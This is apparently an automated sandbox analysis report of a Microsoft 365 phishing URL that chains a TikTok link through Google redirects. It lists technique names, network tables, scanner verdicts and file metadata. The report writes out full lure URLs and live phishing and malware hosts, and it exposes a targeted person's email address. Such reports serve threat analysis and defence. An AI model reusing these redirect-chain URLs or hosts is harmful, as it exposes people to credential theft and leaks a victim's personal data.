Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://rfll.yordickyel.ru/favicon.ico100%Avira URL Cloudphishing
https://rfll.yordickyel.ru/16E/100%Avira URL Cloudphishing
https://ilikethislife.com/favicon.ico0%Avira URL Cloudsafe
https://votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru/aqqmwlrvqzcwktvkpopvdsikJKPNGuiDBESTWYJSWBJUHBXABLMDADRMWZMKQAOEJQRIYUKFBAXNZRU100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.250.186.110
truefalse
    high
    ilikethislife.com
    103.83.194.55
    truefalse
      unknown
      rfll.yordickyel.ru
      104.21.92.210
      truetrue
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.2.137
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.google.com
                    142.250.185.228
                    truefalse
                      high
                      votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru
                      104.21.112.1
                      truefalse
                        unknown
                        s-part-0032.t-0009.t-msedge.net
                        13.107.246.60
                        truefalse
                          high
                          www.office.com
                          unknown
                          unknownfalse
                            high
                            aadcdn.msftauth.net
                            unknown
                            unknownfalse
                              high
                              identity.nel.measure.office.net
                              unknown
                              unknownfalse
                                high
                                login.microsoftonline.com
                                unknown
                                unknownfalse
                                  high
                                  www.tiktok.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEMfalse
                                      high
                                      https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/false
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                            high
                                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                              high
                                              https://ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==false
                                                unknown
                                                https://rfll.yordickyel.ru/favicon.icofalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru/aqqmwlrvqzcwktvkpopvdsikJKPNGuiDBESTWYJSWBJUHBXABLMDADRMWZMKQAOEJQRIYUKFBAXNZRUfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90189d18db7dc411&lang=autofalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/90189d18db7dc411/1736805151193/BfLhLnbiO9Yqi-Ifalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/90189d18db7dc411/1736805151192/4c683360827d691425d2166077a4e8394bbb41868f789c52dc45648af072ad47/6TTr-A3z7QYXfqufalse
                                                        high
                                                        https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724019630993083.ZWExMjFjNGEtZTVkOS00MTNiLWE3NzEtZmMxODkwNWFiMWE4ZTVjZmZhZjAtZTRmYy00NDA2LTlmODQtYWZlMmEyOTJmNDcx&ui_locales=en-US&mkt=en-US&client-request-id=e8ccec18-0850-4901-a2cd-3752b4f2b0af&state=gIdhYVFUJ0CJU0LJ--eqZqaTi_R2TdPt_fjXEZYH9gimqJpqsn0sBX1ln8U--HEPgVUMNMr2w8ul-afyeB-vLyEzKFjRnk_Em_Zvu3NKYguM6KTK1Y6hcn1JzUSyEC9ptelii0woPjLv5agXGymGu7EasMG56a4rqDmzw_Fsuc_9i54EPOqdsOSATqeEuUQ68MXjc0Wa_AlqAiKVwNgbMxoFqXhvlpA68rXV2bvjU86daz47xIeae_cK-Htci6UaUCxDuWTLNYB5j9YWA4-idg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                          high
                                                          https://ilikethislife.com/favicon.icofalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                                            high
                                                            https://rfll.yordickyel.ru/16E/true
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            https://rfll.yordickyel.ru/16E/#Mccuddyre@syftco.comfalse
                                                              unknown
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://login.microsoftonline.comchromecache_83.2.dr, chromecache_74.2.drfalse
                                                                high
                                                                https://login.windows-ppe.netchromecache_83.2.dr, chromecache_74.2.drfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.185.228
                                                                  www.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.18.94.41
                                                                  challenges.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  151.101.130.137
                                                                  unknownUnited States
                                                                  54113FASTLYUSfalse
                                                                  104.21.112.1
                                                                  votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ruUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  142.250.186.110
                                                                  google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  35.190.80.1
                                                                  a.nel.cloudflare.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.21.32.1
                                                                  unknownUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  104.21.92.210
                                                                  rfll.yordickyel.ruUnited States
                                                                  13335CLOUDFLARENETUStrue
                                                                  103.83.194.55
                                                                  ilikethislife.comUnited States
                                                                  132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                                                  104.18.95.41
                                                                  unknownUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  151.101.2.137
                                                                  code.jquery.comUnited States
                                                                  54113FASTLYUSfalse
                                                                  239.255.255.250
                                                                  unknownReserved
                                                                  unknownunknownfalse
                                                                  104.17.25.14
                                                                  cdnjs.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  IP
                                                                  192.168.2.4
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1590299
                                                                  Start date and time:2025-01-13 22:51:18 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 3m 13s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:browseurl.jbs
                                                                  Sample URL:https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal52.win@22/70@42/14
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 142.250.185.67, 172.217.16.206, 74.125.206.84, 142.250.185.206, 142.250.181.238, 2.19.126.87, 2.19.126.96, 2.19.126.93, 2.19.126.72, 2.19.126.68, 2.19.126.79, 2.19.126.80, 2.19.126.83, 2.19.126.88, 199.232.210.172, 192.229.221.95, 142.250.184.206, 40.126.32.72, 40.126.32.134, 40.126.32.138, 40.126.32.76, 20.190.160.20, 40.126.32.68, 40.126.32.136, 40.126.32.140, 13.107.6.156, 40.126.31.73, 20.190.159.73, 20.190.159.71, 20.190.159.23, 20.190.159.75, 20.190.159.2, 40.126.31.71, 20.190.159.0, 20.190.160.14, 40.126.32.74, 40.126.32.133, 142.250.186.42, 142.250.186.106, 172.217.16.138, 216.58.212.138, 142.250.186.170, 142.250.185.138, 216.58.206.42, 142.250.181.234, 142.250.184.202, 172.217.18.106, 142.250.185.170, 142.250.185.202, 142.250.185.234, 142.250.186.74, 216.58.212.170, 216.58.206.74, 216.58.206.46, 20.50.80.209, 172.217.18.14, 20.50.73.9, 20.190.160.22, 20.190.160.17, 142.250.186.163, 142.250.185.110, 2.19.126.84, 2.19.126.89, 184.28.90.27, 172.202.163.200, 13.1
                                                                  • Excluded domains from analysis (whitelisted): onedscolprdneu02.northeurope.cloudapp.azure.com, slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.ak.prd.aadg.akadns.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, a2047.api10.akamai.net, onedscolprdneu01.northeurope.cloudapp.azure.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0J
                                                                  No simulations
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                  Category:downloaded
                                                                  Size (bytes):17174
                                                                  Entropy (8bit):2.9129715116732746
                                                                  Encrypted:false
                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                  Category:downloaded
                                                                  Size (bytes):122725
                                                                  Entropy (8bit):7.997347629519925
                                                                  Encrypted:true
                                                                  SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                  MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                  SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                  SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                  SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                                  Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                  Category:dropped
                                                                  Size (bytes):122725
                                                                  Entropy (8bit):7.997347629519925
                                                                  Encrypted:true
                                                                  SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                  MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                  SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                  SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                  SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                  Category:downloaded
                                                                  Size (bytes):673
                                                                  Entropy (8bit):7.6596900876595075
                                                                  Encrypted:false
                                                                  SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                  Category:dropped
                                                                  Size (bytes):2672
                                                                  Entropy (8bit):6.640973516071413
                                                                  Encrypted:false
